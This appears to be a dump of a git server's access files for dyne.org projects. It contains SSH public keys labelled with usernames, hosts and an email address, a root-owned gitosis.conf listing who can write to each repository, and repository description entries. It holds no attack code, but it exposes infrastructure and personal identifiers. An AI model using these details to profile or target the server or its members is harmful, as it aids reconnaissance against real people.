ssh-dss AAAAB3NzaC1kc3MAAACBAMC1i9mWtyEWyfPX+3ALuG78FYPh3K+xB7A/L+d/oAGMFPq+wqZ+ScxNZ+jmaFictAFcRU5X1mLNxkU8OTUW+cT+aN2+DtWZYNWTHPeqnChNeN/u7Ih9gIM6n2clSjSR3eEmrbtnNaxrNaLdQpYLIcsFHDcfl6Rf6zBMmyszPERTAAAAFQCnYASXfvLesveHQdhfkwYyN28LWQAAAIEAlATKh3G16MYs/oy8sYf+biZXPQHV8VVgT4J7nF+NWBUfcz9tHDeKm1V3skOJo7fMpvbO1Wav+5dquW51ZtxpJQt7n2yEP1tDsMM29GbQOHFeUmsykDSTtAhBwoq6pSvS+AoYlY8zVTB2na6M41MbnLbeMbUwV3xSE+ODBF3I7rgAAACALydwC3+3nhYAnaJXYSfTiOqtFSp6/SrD5nNOkQaTN1M1B3wAOWTp57tqDVThpEvbH/tD4XhlvxiI7gg6FFV/USduifZgqmzQk6587GZHxC0AgWv4PDE/LkOODxsNybHssSbdP4lKeFce1A0kChWftjQmPyQKti3gl+W44t0zxGY= nightolo@debian
ssh-dss AAAAB3NzaC1kc3MAAACBANyWISfPSr/lOJU3qhLgLhB9Akdy/wioQtM/CkDd6Tfma9F3NZYu/sCTV49exUkgPWlsNvojkD+dcvOcjGFPI/hj60HEfFR/hj4hYMMNcelGathAJRDr7gjXg1RgOXFLoObWWKoywHaculBYsicuBXxe3DUFgoiUGD5RA+vPwjuZAAAAFQDCkqDdRuaTyWUcyOUttMrhAqVpwQAAAIBkeREL9HN32XbMnor2t5Iy+J5Z5eOPg93iurIkehgjEjr340pqRXsI8hlHrLFCRAlOnzxG7wZajQ8anKDsinmmssvXOU2qR0b0Cw8XD/+fktPTsktSvdbDQuHkzvtZbKWEnR01vrqN6K2/wgfY8ibYsGjud2aURvXkcm2rRv/1HAAAAIBdXuTADY2MV98gN4BxQpE+QYoOWEkATnc9/zq/wDbkfpzfd0TLQMr54JdK3HfEu67JyLle323GM9vzQuiyix1DlgZ2B+7PgSS7RLMc+1eKsCgKRkOu9OrN2cubJ639dvDt6lz2tVJuOrebShP/xtVlpilf0t1cxBQTy7geX/xGJQ== nignux@golia
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1K8vj7BzIpl2u5RomfFXUpJF1pQarz09QcLpvhQMt8YLniRzkY6bZuJzR2/lhAg4x10nPYuIDCsFU3fNxlU8n461uL7aQjIA67aoEOUQ8LK56xeXRQuWl1wmDFCje4r55eywLlTsi5XJ6gENAARi53UzgQJxFRP/qpEDYh8/u3M= pallotron@hal9k1
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvwCcmZFr4KyDblDc8R8EA6kGhJtgmF+T7HDLs1W9WXFzI/ZFpGo6NBhJtaQ7zD9U09aXs+HIjz5yiRqpvdlav4EvWyasxXPQWbPZTiTuWVFxEibmkha//H/zmxJDvI1mEUfsOZfCIF7oD+RfimkhqukC9rvM1ikbDRl+R6Z78luvNX1YeRrYy9ViZpPmaaPGisWUl0/WpG3HUHcVY4hLQA4c50MIpzXclf9rF6/FLXfKou3oeU3oYVbJBoxHO3BQf1B1V34HA1I8kSYpBxcOVD5bImSJot+PxDkrqblTy6QDeZh4oHMBWVfTll7W2Yjs4NKjFJyNomqjE+7gQlEIGw== psy@psy.kantoor.datux.nl
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEArftbg5nAMsh+Ui05t21gaR5o+ysCIatJ/g4Xmiid23ViatOkJeJLwUXEZ4KiwgJebPu2fCOt/0EhEzBXU6FN2qfOBaDLym2WOO456JHuqJRmyZGD+x+LXSO3e0m1FMWXMHICC3WJlhD6yNqRyye+ANfj0G4b/c3TQbkqWMoptcdC6elaIbkl19hje2shfyJFRop2vqfFZL+kZ/f5pkMgExYIjj6+Uzt8jOz8o4KLKBk3zJqoPTPMqN2TtMHDYsu/JoFBiJEkmDLj+KFlHkFTlKtdE+AoGqFOfUMp4EyEBFhtfCZcs0YdNK44co4F+qzpf05D8+/HapHbBAQbsdrHxw== psy@localhost
ssh-dss AAAAB3NzaC1kc3MAAACBALxboXscYRS3fdXfwLhKyhu6+FlneYVLLBtDrtQJe6TKDfZ+f9zKeckm6m++6kXq9lShJBJdWZrVdDinCjwwevveygLcEbYFVjXXl4fFuBWCsjtCQEqTqxg2nLwfQKnKD2VSfbaNCMV13Sco0NgBebOomWaFaINxiL+htj+MJ715AAAAFQDRDquC2TT9k2lRx4KsToi+PZzvPQAAAIBJMjPlUkP+qJ8eGawnYb72Djk7r4WsrZInyNmmgPVjqIFiYyTPXqpJdxGypl0SwCh+UancJwjMOUCIa6vAvlGdW0BuM4M6w/6uGiuFUaz4Kxcx2cHK6A967qYAWwRlTvYKPFZFdHzvHwc4+UMpJmBtle4CrD+eqvQp7e77HqWThAAAAIEAgftJijPwKa6mJQACRMWOtukGx3bubFy7/hhtP2ilT2aEaTt3xsycjGp5R5yBA2MMeeDVGUM8HPuvWGFJYZ5bECvt2uiTrZguxWol8PWJaGWa7CDv9l20uAnU9Qme90Xfv6iUhnzbGcJ9vX7DlujNjnuakreT0s4rE5k/Zggi3ho= nightolo@ishtar.freaknet.org
ssh-dss AAAAB3NzaC1kc3MAAACBALxboXscYRS3fdXfwLhKyhu6+FlneYVLLBtDrtQJe6TKDfZ+f9zKeckm6m++6kXq9lShJBJdWZrVdDinCjwwevveygLcEbYFVjXXl4fFuBWCsjtCQEqTqxg2nLwfQKnKD2VSfbaNCMV13Sco0NgBebOomWaFaINxiL+htj+MJ715AAAAFQDRDquC2TT9k2lRx4KsToi+PZzvPQAAAIBJMjPlUkP+qJ8eGawnYb72Djk7r4WsrZInyNmmgPVjqIFiYyTPXqpJdxGypl0SwCh+UancJwjMOUCIa6vAvlGdW0BuM4M6w/6uGiuFUaz4Kxcx2cHK6A967qYAWwRlTvYKPFZFdHzvHwc4+UMpJmBtle4CrD+eqvQp7e77HqWThAAAAIEAgftJijPwKa6mJQACRMWOtukGx3bubFy7/hhtP2ilT2aEaTt3xsycjGp5R5yBA2MMeeDVGUM8HPuvWGFJYZ5bECvt2uiTrZguxWol8PWJaGWa7CDv9l20uAnU9Qme90Xfv6iUhnzbGcJ9vX7DlujNjnuakreT0s4rE5k/Zggi3ho=
nightolo@ishtar.freaknet.org
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo/MladRT833b+s8x9q0ygraFk6UWuXfGw1XuFmIAd3W1adOe9ZfrEYVFtZ/gignzayescYrgecIPR+z50zLuAH1uZwQR6Icg3WPOdvMr953o0Gyv46z0mVq1vW1sT35OJouuVthBPUMk3prBkuWesltN8t03iXV9BCDSDAOOxOafeUsRBp4Is4WF6VajqabhCQlkmX4P6wPiQYKwPjZRZ1tjKEUXJ+MQBGsUnUfPhxvgohJtD+92tHEmkXdaUkVrCgjxyLd3ZcF2xppEk29oFARTwuYazpTyvAZeDKP+aDN49F6HnKHOt8DcbYT/KMbcqaGv7hl6Rwy3IBuPKTOPyQ== r7@box
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAy9/fIx2P5bEGBGIIuNJ7VTtz/IUeD9WeS0Hlc8KiCzhOj14lLgE/NiTB6ppq1hDpByGiVgT9g9aKkAHk5GwaFIwzNz235i96/bhlvRcvlqtV3E7sy60QPg2nuGKIMo8djSat0qEoA9mWPYj//0Ds1y+P/OMO2fHoxpkKIpNyQ+IPE+kvoRV3dofDsYRS7hVmiba1mocnGt7qwU913bj0eCTX5iddUQrqd71x9VLdjG6/0SbG7n4rrY3t+XVg3SiSvlxtPzk4Tf0DizwPrQgXtCwKtmDB1r4wwEbQQJ0Et49v3cH5rOl1jNVs9ggQcndd1+UBpmOD4DZsuDGODoYpVw== rama@bug
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsX0hZFb6oYIQilCyu+q8KeVxEgS1y/YLikRdtTO1FePQV+b3rNfiy28zvkq2ez1dnzH70AjI4x3h4YLdOntEfrre5QPcx6z40rNTRZQGAi1/7Y2gz6ICTXd83r7A7fsGaLb2/+kvk/0lP3Ulco40ST8zD4gnmWL39twheMj+1Bk= rgareus@kvant
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAgEAzXEirTa42GK2SXON0adJlKceZnSDDhYJgv7CPuqOF5sljCOZ3VuamaNYHCieovdGxkbTHmDxkA0J9HfXPUwSGUdo/Weq0LlC/6UmHEpHsiNonPwyYRDu5HS3F3g9jeTCzAc9G2DVtY5rrlDBrcDbdLCnfq1xaTquSWEfRgxjNRz7TsL+b7oXkKlvHSTJ5e5R7DvqJygbj928hImPFaEDWf1n4tbY4rjP+k3l4yTZhhC3kctbUYA+kIcQ5x8nIyTpHv3GZakMAJDpIkCFpc6KQkX2LYPPXGSfuC6AHkfjGHQV0kbf+gc1isWEj/fsmB8kAwzDkOHXqs2apqXjzhIWDA1iUUJrYDULldOPIOT7Yz4EENd4Yi38WUTtdw2AZkT+uknHoMrF7zjJ2zVsHDX2qFcbwdPUUBj8a4H2b9QdVcOxEoEKueb9nAU4NMPpJq8dioq9ckY9vn8pRgDdx8VSPhB1I3aHwyVMFzJTDVLI+EulxUCj414uj8HhKi1XY/FlDXOIjV/leXqoGk3zvlVqeXXBjai/4FZYQjeNul1LDRqEfQKEad0OidkOcWEnOF4iHXI4EGvoGU42xi5k3eKMRxvzGp3Xa2w98yU8YyUADhkXmKxjENjyOxRhMCnjJEHWrduRRCzO6iytGDFtiMKp4pkTr0j8+0bhJh1SrTygI6k= rgareus@priroda.local
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwI5/otAwHEigEiCWa5DYWE++2/ZNyT3LOfkpKcusk37Wwx43crPl73CXjW7H0eQtMCktvjFQTFxtaOQJeXEi2UTkBNj6bsMeb0eVPY9Gy+eTmUhcF0tmpGuz/N65J9HwwnJEDckbWZ9QfhTHhetLq1x6Ly9mysKF37SJdNRI5ebEZhRtjuu9ygC7xsC9G26WIbeBZ5VSxleAFStUtBojMXnmR+e46pJ/0RiGB5lr70XM+vzu24syvKvHyhQaF8NmBldGV1XpEvX6r96xyS4wnimJbSbUvwrt4nsQjKBO7Uds1l1BRsGVFkrOjpLIOXF6p/iyOy/OWXsxXifhVnUMLQ== oracle@monostatos
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0U3vHcQNV3qc4nsv7hJROEW+eTZDiAJcia/ydLy0M1BJI/1XDoOYE+2b/EBRbEkrxPS64tOV00FAAG9lQ9lNkmBuhg+Zz3iE/47a/t0nAcwY9jHMOxoP7bzZI8AusqfwuHZGklP0IRf9izDDqIyVZyOEIBMsRiOT4NFflG3+memmGRkiW4arIxf4Q5DDEKNYEE53FMtfg+XLncev6wJm5PaB3iByKbDXVmTaG4vns8mYmajiIXiYo/FJN+pdyvd4mew6oKdrWSprcCPV6APgEH6PTI66Js+UTN4vHqM0jYTQ285u7GaKfreQ6VaCWKOL0dYu9LBXNCZH9EfEvCnphw== Se trovate queste chiavi mandate una mail a daniel@spatof.orgssh-dss AAAAB3NzaC1kc3MAAACBAKGxbPjDnHtuSFJnJGk7C0ndmznQv/lIeZ0UDDFzSf3oU4ewV9NIKA1IVG03tzXSfgqpCYzxBmu6PzftZA0OXr8e772DkF7LY2r48XXl20dO2y1jMMUCkvbjf8dwJp144xZiKv3ZGwtdrfitXjzmyYN2fy+m+gLmwU1mlMOic9MXAAAAFQDVCXcTGqI0e7E95lRZcf7bql2CywAAAIBZ9CD5L8Do74p/rwVp0jCBKF5DRAE/Yi3m45r8qi3e1qKBeX1h0vBciGh3bu+AM3GKPeiASrmimfZOWp4je01U+tPf5BD17GhwNDdBzRFXskcPz6Ws7Tqu/jIGHU9etAm44AaUGtjAVYHVuWyTqcKCkhIevVpEd+yUprZ6g2NbegAAAIA6y1N5Z+UQPlqGjrw0hNDt8X1TxInmPxhlUp/PMXiKV6QUfOQd/meMYp1S1LGm1YHtWke/qnGMk8egOekhcI8rpnULejHKnqFn98ypXYkEDnNAY9iaoHyzUodTmEJ+j/t/9B2denbyiypbFcNl9DwnS3wB6kFjFlf6IwgNVUf7Gw== shammash@gino.shammash.lan
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGmyXBy+fgvaeSSXrXsrSrUqfEM1JyeEv3zs7guz0v7ISV65mt/TFrDvq3OiELZZPCG25OtA+PdbrFWph3PVhwf2a0QT4la9t1dp71HcwOQQyOvGf0/sm+3Ye7GY8nh6mHhcd2iyg+pfL7AzEfBszlCKYdSl9W++2pnRPw4NyLv2xVk/5d59UB9ccHk2Ud7LMmagbl+a++qRiMh0SrZNNUizu/n5449kzRO/H99kocj1dSi3TULaRAEKtnKRLpIXFk5HMZDwqIwdVlyjhMX2cF5VeocCmYhMD9p20RIO561wzrIPBf6V6wSgf46YYQM6CqzVO+BQTcIP5zzrGrj2Qf simon.eu@gmail.com

ssh-dss AAAAB3NzaC1kc3MAAACBAOhcc4orFDTsShEHedMOy3kZ9ZDobkOy4UvL+1FZIlJa7XEPDxOpQhWXnCEUnrFNMtOHWhR5t8ELXIiBJWseyGedLCpTxRUnXq346kQg0NRIRVPWD5pgrpk57ugZ1qxk9VV7cP3/y2jhNa4Kz/96W0911ww88Aei2u++NpXmz/RjAAAAFQDpFkCr2gcAL8PZp466lZZebJYMWwAAAIBDDak1DBcdvGHPOgGLMWxtgIHvDQvSfHVIIUkodJbNR+4qOS4GV0klff15OXXbCULEJewvKWToKrA/eJDMdtU8bg7l8piVK6E3pzAcXzMc0DAEJhligBOnEJH6/RLvvE82FsHwAijbGs8kpmmzPk93jRxxR6yGMmscIVaKdOubXAAAAIBleaXdybdiA2MkGRnCLubPeZ43dabyxHfK2sl1WCPeUEeGQ549zckKnqx0+Un+PRfQFE1zzUdHdL++HNJbLQZ8t2v5H+UhVjUgAo3i05s5eUYSwwuNij740V05v9PURiW+opwZhgVVECjzAQrjFe96krQjwEjdDPt79M5bQIBcyw== stevo32@localhost.localdomain

ssh-dss AAAAB3NzaC1kc3MAAACBAPKlAbFNovsNI8iJJ2FMMXUTegEso+9Kg0eF0I3rNO1gMJM77rywLv3qAkHtbCi6O7sOqerraAmfkXXNgdAScuDnLzdr6FTcUofSoBVbChPY8WOmOFEmhUmDdMipOA3agW8FLQBU547jubwbycgUuLD/gYedyfEagjXZaPdFPgxNAAAAFQD500ZOiWpumH82CgpUDcIzFcM9hQAAAIEAyCbKss44x0u3z7gwMU4yBnN06xj1fNtIBxflnGA0WHntD/jAFJwndmdVa5YVgf+oA6WqfB2oHzKYyrkEBPItaM5qJxz1e/+y32x6+iIEjXukPcuL0ypyoXLLuroftI+i5un13gOl7UbdGLUSt/V8fqIFzM9yy3cNAkXLdjrRY+EAAACAXzWumb9odExSIxeB50zVO39jyXCI0A00LrST3EX8fOcI88VgMCuxNfrp4KaVHuzjNVM9DCG8XybJIeNoEqJJ07/y+l2U6DlamElTqtojT+Y3wmmgTnTsblAez1VnMquS0pVC7Z/0BXYEu53Gc+TBkKcdcfexSlyJxyDgF0m1s2o=
ssh-dss AAAAB3NzaC1kc3MAAACBAK0rleO5jOiW3FDWHEKHVWQfEfmnFgsXCntzUNll4eYuIfz780sQMii0Emy8CFhKMXqCUmhRC6xu602mjY8kBN6AwLg8AhEFVZoLMsNYLkNK/RY+APe7gNn454+RVBCan1xW9m/8XQbB/v9ebJfehrmlBba8xs7WhvL3fR5Puf0PAAAAFQCmJ34D1rXjI6DnyvPKkjhOtnw+vQAAAIEAiOAW2VKz5odJfG60YZTzHffI4yv6kjetBB6gfUYCzZ8UKLlOIRwD1Yo5ziDIDLdZ8HpNMa4vGgBud4Ft6D6cIXR1aH79I6RYfIilgvSEb1Sxbh413eGwpaAyQXyQNYvlA0W5Y22O7exH+TA5zXgz6jkLoA5WvG20pyrQyHzHSKoAAACBAIq9GK6zTEGV6ojwRVB93O4K0Mafk6a4PXMw3polZyAYZKQplbEgN6sGTaSYOOJMVfYbCqBGIgVi89eXoneDBSyhuSjT3ENUqj+mSQ9MczWLvivaFzxJm5aZiCu+CxbLMpPPmO7k32ONTWO2WjMmEHdt6Law39OsMhisyQN79O6t nightolo@tamarindo.dyne.org
yo, this is my key:


ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEA8ehb2TxH7BSH3DxtKvu1M+Tl5rzYUM/qgAIwJMWrTTzk/iyKFlYYbZ2QMctAtv3WUBj/jzAgUh6V8V6gp6KQNHcj7wp4kKylV3k+JrXWt7XKnF7NagQeeyPfeIO40rSo0XyQY/IXJE4WjBV1YisqTEZ21VLDoSLxzqkWjNZsJeTppMWsSabD9P2wdLdPaElg591ZOd08GvZhfe00plzJi17DQfpOVchpf1Oz/JDuWifR90zaxAMfcIMSmYHCJ9KFYgk0CbCiEmJfivO8MSwPqeAo0Au8xBnCa/XxuQ9NSGcg7Z7tlkFIZd6mvWO+jU5xLOq+WjDJbvUyfB5pIjYnSQ==
tatiana@omelas


ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsytrGBNPLm2QwSn5mehKLMXpuCJNIxlXJsIsgZd25N3MkMYDPIPCodUMAQYcbYrhoqbQDmtgHI9MUyh2tAbQSet8pHs/Bvy2XaWBqB4Y3BO7cuDJX3xp/JCL/Ed/KmvNhypMpnSzzTcLOnpkOUkH/iNd43a1hNDWr4r2FXmeJXLkCPvsADl119jjwnFMURpjjTloS6/0t+wNDqGcsfjyu9rZfK6eOb94zvDTPTquNq2eBIssTd3B/QjYhdrzVSC5Oh/BtQekt3UAyClzXulWEpUAe0XLL2PkoR6+qQ7DUlggX0xLsfs011qI+cwVJ2G25ZGkrhB+WAHahk+oj+dP9Q== topi@dyn601.panoulu.local
ssh-dss AAAAB3NzaC1kc3MAAACBALs5WDrM/cssMAxJ/fJZU8+reEToEXh/HWuImKNdbQw7Vt5XieoCHhqO2hpXGPLLrMzPtVllBjPU4TOB8XS5Cns/HiWDX7DmecaueQxfQ8MTvSI1Fm648uglFjmWrWDtsOkffR6wmqY+Z5o+5zP5VSqXArFv1lWpqH/Gyyq1ebwhAAAAFQDcsKxMM7ow57Q48+rkVjHXCF5J0wAAAIAQ7GbZjMp1StYPYmws/Grttq9/nXJZJRfneeVf+u9BFFPw4BbF56Pb7AjjoqeUMhV/XlAXb9d2fZRFy+Id6oSxYMIcZXwaLTLZ0xyBJB3mgAencjJ508C3ARwb7JgJj0gP45HsjDheVyapiDT72dcv/DHjRudYl+8QjMqQz6vv6gAAAIA89O4a7NX+PxE7CjFbhUj4TzBD8kfb4ewDSS/vKmruEWPZs9+M+4QQWNBkzcI2CIET3Q5Akn359ZQuQ5PXffY8QYreHcWEZpo6H5Hz2nrRC2WaLNABmIpgfZ9EeL4H4PXMTyCHxN5OIZJIgli31G085qZA5wwlxy9v44h/e5tuSA== ultrotter@rw
ssh-dss AAAAB3NzaC1kc3MAAAEBAOXyETr2JPn8AnWlo6I99GIMtfaBN0Xe6zzVQwuGnPcOlCv5a9lZGdy34OiD8d80veR/1wyidUjIftF+PhnfvRmI78UhCkAh9y9srEOMBfrYxgzT0gPqwugmPBCs8IJd/UhC6RgD1LxZt/dYq5APBcaYg3wZjaxaY0pGjOh/Ky/RfE5nrVxSDFkvxq3KMJW376NJMv9YtJoTtDZRalraLJ0cKIElLcglnShGLLqVmVFQn1LLUrgyNn2PWY9brkmCYMAexDpPyxm+WuiMUB2Rn9qpSp3UJzRY1FlDE1bwtvBxEFNWNTadfIA+syQiJVNadirsnc/KzlnrsQIrmE7/NGkAAAAVANjEOxoKKJO8b8z9MI8QxzJ539vlAAABAQDKf0xd1MOlYnCM6nDJrotjTzhOKKrZuRryiulUqpFIdD/dcNeKBDPE3/0MSeFa9n2MDCUP5GzgkAWb6y3GTv/olr/2JUrFIUDK/83Dw6vuo+thojnRxJCTt2a27iEPrLou3heLWxGWfvUWv/OrVZgjkEAWcNiaVb7cFG7NaqvpQbJ0T3F4TMRiMzJFfOSH5bOMqbyEphIjiywgvWoCRdxfTdj1DulThn1L7gN7/4iJ+8Nb43HgekxXtsoYbe44Xo7UVx+jgXkgiA1dyezaK47l7GXV/3NmhKJNTBs61qPEEf42Id1lh93LhGOCr60+12VW7SI1PnEj05IyOGiP3GWGAAABAQDP/Of/UjVNyA2hhl2yJW9FSXQx1FsLNlDKstzG2cAZjI/L+JEPV40LrORndX+2Xe8eLhmbS4gJRqbmEznqprVtpNQR3gM8HJABPuZi7cVYIk2RoMdMmubUO50tXWiViZDEUY3csTjWMgrDQuHUmq/oHKW1xnxGmrMc4kQU+PlQmIOsn79oL1wKqEaApGIT6wptG+zACoDmpBGxanKeu7SGUdj0f8m7BUvJW1mPZBCRxatDwZxYUwh4Yx6d73jzafOEDHDAuEsVi3QJBV8PEHt4VNepgruM7anT0rP6DMdqCP0LCCCrcNnkrXUY0cm9wYiTl38CXZn5lcGptCYJp04N root@thor23
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4ma3+R+JM85PXT9vWqxKWRV/+/c8SHa8uueUybGcJS9tSdY4ys5JSgeOYmffAdjWztv61dkPBH9MPwPaOSBK8paU148zINZAIGD6CbBxP+YluDSMU1VETFcz/dkwDhGqWLhV7lA7kqO3wXpmYyU+ruxRie3fMZlwYiPhpmM3OkmRpk+ZBTxZlGM+70pANpr9JKhUlcRPMvvQtwNlsWt9WXCWOgZpBYjy6zrDqazNY0yUm4VFsXC2Fkr5U779MA+bFjfiMf9NxJU4MnjLmSqIfh2Twuwty63VX792eV7Es2SboO5dGNGSiCSvavQ/Ks6tprOSmyCt41Uu5G+HQIxXOw== chompe@chante
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA9yGyE6igvQtMMdYkrtM9ETKk5FgfDOdlCUSjrvF2a2QEqK5EShQimysmyM7Nc99QyPUk3jOpPvPc3CI42ACdufZ8n8h/Gr5UaaboFN9UnbihOiu2+onTvC6sKRSMU3ZSNexBVog/xUZZHgKrwD5XNtvePSsBBWyblBpUSw1WZhVoebQ5/zxQrU764EmjBtGqfMoLhQJNUnPC3k/bZSb/qDkI+bUpCkwjxWEAByI3GjGEkzeBIjeSQsUkBpYhLMMnVq9E+XbvLWUyJ9+tNPN9qUjy1jifhUFNKGlNh0CQYIzuUUQ9SNviq6wlPI4aFOr50ulvLH299Lgokb3fdAl6PQ== willy@selena.lan
ssh-dss AAAAB3NzaC1kc3MAAACBAOiM7c2RH9GpqV340+7y1hxG5IfYt2n/WObSTirTeS3ZbKDfLfccTCbC2K05RzACQiZPQ/rPjLHgzfqa/VcIHoIv1i7OUMcJMYJA99hIeXbbz71xTRlLD8Rpuc0sfwmDHQeDxQOraY+RD6/SkiqwMjjwbPV5oeGtJzr2nBjA1qZZAAAAFQDX2CRjWX61JFhgYu9JI1LEV6ipNwAAAIBfgNGveNhHUfxK53kwnm42apnMvzX2PejjjjBT4ViEC0v8pIWUojDglh0pYhokrpB2Yx0ZTGjsNpdLh+qK/fA8uK8W4tX6hpOCH7Hk1TcVGkG77vIKIC/gASSsZoscaevvwzLf5UwRF10YB39zhd3uIKH0W030zqf2iUtLqda4fwAAAIAiMZKNsq24hgsN9iSiizc803lqn1+pX1QQMyMczd1ohwcAvoehJvTIJDIkQgPsRleMm5SqemZPYbFhAPfW7Z3PUYM+HvflP9/oSO8TjHxNdG2BeEbhZuy60cr7xtQQeRGeb39jiPpRAj6i8FF0vwSHQhUH9wFoP/MhuanNxwpB3Q== xant@xBook.localssh-dss AAAAB3NzaC1kc3MAAACBAOiM7c2RH9GpqV340+7y1hxG5IfYt2n/WObSTirTeS3ZbKDfLfccTCbC2K05RzACQiZPQ/rPjLHgzfqa/VcIHoIv1i7OUMcJMYJA99hIeXbbz71xTRlLD8Rpuc0sfwmDHQeDxQOraY+RD6/SkiqwMjjwbPV5oeGtJzr2nBjA1qZZAAAAFQDX2CRjWX61JFhgYu9JI1LEV6ipNwAAAIBfgNGveNhHUfxK53kwnm42apnMvzX2PejjjjBT4ViEC0v8pIWUojDglh0pYhokrpB2Yx0ZTGjsNpdLh+qK/fA8uK8W4tX6hpOCH7Hk1TcVGkG77vIKIC/gASSsZoscaevvwzLf5UwRF10YB39zhd3uIKH0W030zqf2iUtLqda4fwAAAIAiMZKNsq24hgsN9iSiizc803lqn1+pX1QQMyMczd1ohwcAvoehJvTIJDIkQgPsRleMm5SqemZPYbFhAPfW7Z3PUYM+HvflP9/oSO8TjHxNdG2BeEbhZuy60cr7xtQQeRGeb39jiPpRAj6i8FF0vwSHQhUH9wFoP/MhuanNxwpB3Q== xant@xBook.local

$ cat /root/gitosis-admin/gitosis.conf
[gitosis]

[group gitosis-admin]
writable = gitosis-admin
members = jaromil night pallotron acracia xant dandennedy

[group freej-devs]
writable = freej
members = jaromil goil caedes shammash ultrotter xant loupgarou robin niels alex godog asbesto andy lluis buzz fred_99 night

[group freej-contrib-devs]
writable = freej-contrib
members = shammash jaromil xant godog goil

[group tbt-devs]
writable = tbt
members = jaromil pallotron caedes robin shammash godog meinhard

[group ivysync-devs]
writable = ivysync
members = jaromil

[group hasciicam-devs]
writable = hasciicam
members = jaromil godog shammash

[group hasciicam2-devs]
writable = hasciicam-2
members = blended jaromil hellekin

[group dynebolic-devs]
writable = dynebolic
members = jaromil

[group muse-devs]
writable = muse
members = jaromil xant pallotron night katolaz shammash godog mancausoft

[group freeeee-devs]
writable = freeeee
members = jaromil jebba

[group infopoint]
writable = infopoint
members = acracia caedes duy cal

[group feeling-equalizer]
writable = feeling-equalizer
members = acracia

[group frei0r-devs]
writable = frei0r
members = jaromil rspindler shammash godog dandennedy hedde maksim gisle marko simon

[group manual-edit]
writable = manuals
members = jaromil vlax buzz alex asbesto

[group jaromil-env]
writable = jrml
members = jaromil

[group jaromil-desktop]
writable = jrml-desk
members = jaromil

[group pallotron-finance-sw]
writable = perl-finance-bank-ie-permanenttsb
members = pallotron night

[group battery-stats]
writable = battery-stats
members = night

[group mb]
writable = mb
members = night pallotron newmark

[group gmusicbrowser]
writable = gmusicbrowser
members = night pallotron

[group wintercamp09]
writable = wintercamp
members = jaromil caedes rama shammash crash

[group BLAG]
writable = blag
members = r7 vasco jayeola extraspecialbitter jisis junichiro lxo stevo32

[group dyne-webmasters]
writable = dyne-web
members = jaromil hellekin vlax asbesto

[group dyne-webmasters]
writable = dyne-web-tmpl-muse
members = jaromil

[group demosceners]
writable = demoscene
members = jaromil

[group perl-monit-http-api]
writable = perl-monit-http-api
members = pallotron

[group mifhackers]
writable = mifare
members = jaromil gabriele bucciarati ciaby

[group f1x-eu-webmasters]
writable = f1x-eu
members = hellekin jaromil alice acracia

[group criticpaths-devs]
writable = brainch
members = aleray jaromil

[group lisight-dev]
writable = lisight
members = xant

[group dyne-cf]
writable = dyne-cf
members = night quico quico-test tamarindo-test godog sucalora

[group dyne-cf-repo]
writable = dyne-cf-repo
members = night quico quico-test tamarindo-test godog sucalora

[group pinolo-dev]
writable = pinolo
members = sand

[group dirsum-dev]
writable = dirsum
members = jaromil

[group hdsync-dev]
writable = hdsync
members = jaromil

[group autorg-dev]
writable = autorg
members = jaromil hellekin loupgarou

[group veejay-dev]
writable = veejay
members = niels jaromil matthijs

[group veejay-ng-dev]
writable = veejay-ng
members = niels

[group devshell]
writable = devshell
\members = loupgarou psy0rz

[group libdisorder]
writable = libdisorder
members = locasto jaromil

[group digitalchemists]
writable = digitalchemy
members = jaromil hellekin alice

[group tomb-dev]
writable = tomb
members = jaromil hellekin boyska asbesto anathema nignux mancausoft sand

[group vloopback-2-dev]
writable = vloopback-2
members = lluis niels jaromil

[group jmx-dev]
writable = jmx
members = xant igor jaromil willy

[group synapse]
writable = synapse
members = psy0rz jaromil

[group ring-dev]
writable = ring
members = newmark xant

[group zones]
writable = zones
members = night jaromil

[group avremote]
writable = avremote
members = jaromil

[group bitcoin]
writable = bitcoin
members = jaromil asbesto topi

[group dyne-apt]
writable = dyne-apt
members = jaromil night

[group dyne-search]
writable = dyne-search
members = jaromil

[group postino]
writable = postino
members = jaromil

repo.url=freej
repo.name=freej
repo.desc=Realtime Vision Mixer
repo.path=/srv/gitosis/repositories/freej.git
repo.owner=freej.dyne.org
repo.defbranch=master

repo.url=frei0r
repo.name=frei0r
repo.desc=Minimalist, cross-platform, shared video plugins
repo.path=/srv/gitosis/repositories/frei0r.git
repo.owner=frei0r devs
repo.defbranch=master


repo.url=hasciicam
repo.name=hasciicam
repo.desc=(h)ascii video 4 the masses
repo.path=/srv/gitosis/repositories/hasciicam.git
repo.owner=ascii.dyne.org
repo.defbranch=master

repo.url=manuals
repo.name=manuals
repo.desc=Printable educational material
repo.path=/srv/gitosis/repositories/manuals.git
repo.owner=dyne.org
repo.defbranch=master



repo.url=muse
repo.name=muse
repo.desc=multiple audio streaming engine
repo.path=/srv/gitosis/repositories/muse.git
repo.owner=muse.dyne.org
repo.defbranch=master

repo.url=tbt
repo.name=tbt
repo.desc=Time Based Text
repo.path=/srv/gitosis/repositories/tbt.git
repo.owner=tbt.dyne.org
repo.defbranch=master

repo.url=dynebolic
repo.name=dynebolic
repo.desc=GNU/Linux multimedia nomadic OS
repo.path=/srv/gitosis/repositories/dynebolic.git
repo.owner=dynebolic.org
repo.defbranch=master


repo.url=demoscene
repo.name=demoscene
repo.desc=demo prods for the gnu/linux scene
repo.path=/srv/gitosis/repositories/demoscene.git
repo.owner=rastasoft.org
repo.defbranch=master

repo.url=infopoint
repo.name=infopoint
repo.desc=non-hierarchical social space organization website
repo.path=/srv/gitosis/repositories/infopoint.git
repo.owner=delcorp
repo.defbranch=master

repo.url=brainch
repo.name=brainch
repo.desc=distributed text editing based on django and git
repo.path=/srv/gitosis/repositories/brainch.git
repo.owner=stdin.fr
repo.defbranch=master

repo.url=autorg
repo.name=autorg
